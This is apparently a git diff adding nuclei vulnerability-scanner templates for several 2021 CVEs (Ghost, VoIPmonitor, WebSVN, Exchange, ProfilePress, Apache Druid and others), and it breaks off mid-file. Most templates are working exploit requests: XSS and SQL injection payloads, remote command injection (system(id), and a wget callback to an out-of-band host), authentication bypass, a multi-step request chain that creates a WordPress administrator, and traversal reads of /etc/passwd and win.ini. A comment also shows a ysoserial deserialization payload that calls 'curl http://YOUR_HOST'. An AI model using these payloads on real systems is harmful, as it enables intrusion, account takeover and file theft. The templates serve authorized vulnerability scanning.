a/nuclei-templates/CVE-2021/cve-2021-29484.yaml b/nuclei-templates/CVE-2021/cve-2021-29484.yaml new file mode 100644 index 0000000000..937184490c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29484.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29484 + +info: + name: DOM XSS in Ghost CMS + author: rootxharsh,iamnoooob + severity: medium + description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. + reference: + - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + - https://www.npmjs.com/package/ghost + - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 + tags: cve,cve2021,xss,ghost + +requests: + - method: GET + path: + - "{{BaseURL}}/ghost/preview" + + matchers-condition: and + matchers: + - type: word + words: + - 'XMLHttpRequest.prototype.open' + part: body + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-30151.yaml b/nuclei-templates/CVE-2021/cve-2021-30151.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-30151.yaml rename to nuclei-templates/CVE-2021/cve-2021-30151.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-30461.yaml b/nuclei-templates/CVE-2021/cve-2021-30461.yaml new file mode 100644 index 0000000000..b8e046e7d5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-30461.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-30461 + +info: + name: VoipMonitor Pre-Auth-RCE + author: shifacyclewala,hackergautam + severity: critical + description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. + + reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + + SPOOLDIR=test".system(id)."&recheck=Recheck + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + - "VoIPmonitor installation" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-31537.yaml b/nuclei-templates/CVE-2021/cve-2021-31537.yaml new file mode 100644 index 0000000000..4ef98e0a48 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31537.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-31537 + +info: + name: SIS-REWE GO version 7.5.0/12C XSS + author: geeknik + severity: medium + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + reference: + - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ + - http://seclists.org/fulldisclosure/2021/May/20 + - https://sisinformatik.com/rewe-go/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SIS-REWE" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-31589.yaml b/nuclei-templates/CVE-2021/cve-2021-31589.yaml new file mode 100644 index 0000000000..f28ff8aa59 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31589.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-31589 + +info: + name: BeyondTrust Remote Support Reflected XSS + author: Ahmed Abou-Ela + severity: medium + description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. + reference: + - https://packetstormsecurity.com/files/165408 + - https://cxsecurity.com/issue/WLB-2022010013 + - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb + - https://www.beyondtrust.com/docs/release-notes/index.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31589 + cwe-id: CWE-79 + metadata: + google-dork: '"BeyondTrust" "Redistribution Prohibited"' + shodan-query: 'set-cookie: nsbase_session' + tags: cve,cve2021,beyondtrust,bomgar,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" + + matchers-condition: and + matchers: + - type: word + case-insensitive: true + part: body + words: + - '' + - 'bomgar' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-31856.yaml b/nuclei-templates/CVE-2021/cve-2021-31856.yaml new file mode 100644 index 0000000000..e087dac85d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31856.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-31856 + +info: + name: Layer5 Meshery 0.5.2 - SQL Injection + author: princechaddha + severity: critical + description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns + in models/meshery_pattern_persister.go). + reference: + - https://github.com/ssst0n3/CVE-2021-31856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 + - https://meshery.io + - https://github.com/layer5io/meshery/pull/2745 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 + tags: sqli,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0" + + matchers-condition: and + matchers: + + - type: word + words: + - "709b38b27304df6257a86a60df742c4c" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml b/nuclei-templates/CVE-2021/cve-2021-32172.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32172.yaml rename to nuclei-templates/CVE-2021/cve-2021-32172.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-3223.yaml b/nuclei-templates/CVE-2021/cve-2021-3223.yaml deleted file mode 100644 index fe7e20a056..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-3223.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-3223 - -info: - name: Node RED Dashboard - Directory Traversal - author: gy741,pikpikcu - severity: high - description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. - reference: - - https://github.com/node-red/node-red-dashboard/issues/669 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-3223 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - - matchers-condition: or - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: word - part: body - words: - - "Node-RED web server is listening" diff --git a/nuclei-templates/CVE-2021/cve-2021-32305.yaml b/nuclei-templates/CVE-2021/cve-2021-32305.yaml new file mode 100644 index 0000000000..45fb64b4ce --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-32305.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-32305 + +info: + name: Websvn <2.6.1 - Remote Code Execution + author: gy741 + severity: critical + description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + reference: + - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://github.com/websvnphp/websvn/pull/142 + - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 + tags: cve,cve2021,websvn,rce,oast + +requests: + - raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-32853.yaml b/nuclei-templates/CVE-2021/cve-2021-32853.yaml new file mode 100644 index 0000000000..3bc5300c3d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-32853.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-32853 + +info: + name: Erxes <= v0.23.0 XSS + author: dwisiswant0 + severity: medium + description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 + classification: + cve-id: CVE-2021-32853 + metadata: + shodan-query: http.title:"erxes" + tags: cve,cve2021,xss,erxes,oss + +requests: + - method: GET + path: + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'topic_id: "' + - "window.erxesEnv" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3293.yaml b/nuclei-templates/CVE-2021/cve-2021-3293.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3293.yaml rename to nuclei-templates/CVE-2021/cve-2021-3293.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/cve-2021-33044.yaml new file mode 100644 index 0000000000..09217ac1d6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33044.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-33044 + +info: + name: Dahua IPC/VTH/VTO devices Authentication Bypass + author: gy741 + severity: critical + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + reference: + - https://github.com/dorkerdevil/CVE-2021-33044 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 + - https://seclists.org/fulldisclosure/2021/Oct/13 + - https://www.dahuasecurity.com/support/cybersecurity/details/957 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-33044 + cwe-id: CWE-287 + tags: dahua,cve,cve2021,auth-bypass + +requests: + - raw: + - | + POST /RPC2_Login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Connection: close + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"result":true' + - 'id' + - 'params' + - 'session' + condition: and + + extractors: + - type: regex + group: 1 + part: body + regex: + - ',"result":true,"session":"([a-z]+)"\}' diff --git a/nuclei-templates/CVE-2021/cve-2021-33221.yaml b/nuclei-templates/CVE-2021/cve-2021-33221.yaml new file mode 100644 index 0000000000..3b6825a4ed --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33221.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-33221 + +info: + name: CommScope Ruckus IoT Controller - Information Disclosure + author: geeknik + severity: critical + description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + reference: + - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf + - http://seclists.org/fulldisclosure/2021/May/72 + - https://korelogic.com/advisories.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 + tags: cve,cve2021,commscope,ruckus,debug,service,leak + +requests: + - method: GET + path: + - "{{BaseURL}}/service/v1/service-details" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - type: word + words: + - "message" + - "ok" + - "data" + - "dns" + - "gateway" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-3377.yaml b/nuclei-templates/CVE-2021/cve-2021-3377.yaml new file mode 100644 index 0000000000..bceb482946 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-3377.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-3377 + +info: + name: npm ansi_up v4 - Cross-Site Scripting + author: geeknik + severity: medium + description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. + reference: + - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf + - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 + - https://nvd.nist.gov/vuln/detail/CVE-2021-3377 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 + remediation: Upgrade to v5.0.0 or later. + tags: cve,cve2021,xss,npm + +requests: + - raw: + - |+ + GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 + Host: {{Hostname}} + Connection: close + + unsafe: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "com\"/onmouseover=\"alert(1)\">" + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/cve-2021-33904.yaml b/nuclei-templates/CVE-2021/cve-2021-33904.yaml new file mode 100644 index 0000000000..331900d021 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33904.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-33904 + +info: + name: Accela Civic Platform 21.1 - 'servProvCode' XSS + author: geeknik + severity: medium + description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS. + reference: + - https://www.exploit-db.com/exploits/49980 + - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21 + - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 + tags: cve,cve2021,accela,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"' + - 'servProvCode' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-34473.yaml b/nuclei-templates/CVE-2021/cve-2021-34473.yaml new file mode 100644 index 0000000000..e86d9b44c6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34473.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-34473 + +info: + name: Exchange Server - Remote Code Execution + author: arcc,intx0x80,dwisiswant0,r3dg33k + severity: critical + description: | + Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + reference: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 + remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-34473 + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - method: GET + path: + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' + + matchers: + - type: word + part: body + condition: or + words: + - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" + - "Exchange MAPI/HTTP Connectivity Endpoint" + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-34621.yaml b/nuclei-templates/CVE-2021/cve-2021-34621.yaml new file mode 100644 index 0000000000..1cf1c27f69 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34621.yaml @@ -0,0 +1,112 @@ +id: CVE-2021-34621 + +info: + name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness + author: 0xsapra + severity: critical + description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. + reference: + - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin + - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 + - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/ + - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + tags: cve,cve2021,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_username" + + {{randstr}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_email" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password_present" + + true + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_first_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_last_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="_wp_http_referer" + + /wp/?page_id=18 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="pp_current_url" + + {{BaseURL}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="wp_capabilities[administrator]" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_form_id" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_referrer_page" + + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="action" + + pp_ajax_signup + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="melange_id" + + + -----------------------------138742543134772812001999326589-- + + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In + + - | + GET /wp-admin/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to your WordPress Dashboard" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-34640.yaml b/nuclei-templates/CVE-2021/cve-2021-34640.yaml new file mode 100644 index 0000000000..f56d7fe0d5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34640.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-34640 + +info: + name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4. + reference: + - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 + - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34640 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET //wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-34805.yaml b/nuclei-templates/CVE-2021/cve-2021-34805.yaml new file mode 100644 index 0000000000..2ba871728e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34805.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-34805 + +info: + name: FAUST iServer 9.0.018.018.4 - Local File Inclusion + author: 0x_Akoko + severity: high + description: An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal. + reference: + - https://cxsecurity.com/issue/WLB-2022010120 + - https://www.cvedetails.com/cve/CVE-2021-34805 + - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html + - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-34805 + cwe-id: CWE-22 + tags: cve,cve2021,faust,iserver,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-35464.yaml b/nuclei-templates/CVE-2021/cve-2021-35464.yaml new file mode 100644 index 0000000000..f71ba6c55b --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-35464.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-35464 + +info: + name: ForgeRock OpenAM <7.0 - Remote Code Execution + author: madrobot + severity: critical + description: | + ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. + The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted + /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) + found in versions of Java 8 or earlier. + reference: + - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464 + - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html + - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 + tags: cve,cve2021,openam,rce,java + +requests: + - method: GET + path: + - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + + # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=' + # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Set-Cookie: JSESSIONID=" + part: header + + - type: word + words: + - "Version Information -" + - "openam/ccversion/Masthead.jsp" + part: body + condition: or + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-36749.yaml b/nuclei-templates/CVE-2021/cve-2021-36749.yaml new file mode 100644 index 0000000000..703728a67c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-36749.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass,druid + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or diff --git a/nuclei-templates/CVE-2021/cve-2021-37216.yaml b/nuclei-templates/CVE-2021/cve-2021-37216.yaml new file mode 100644 index 0000000000..25f31aa3fc --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37216.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-37216 + +info: + name: QSAN Storage 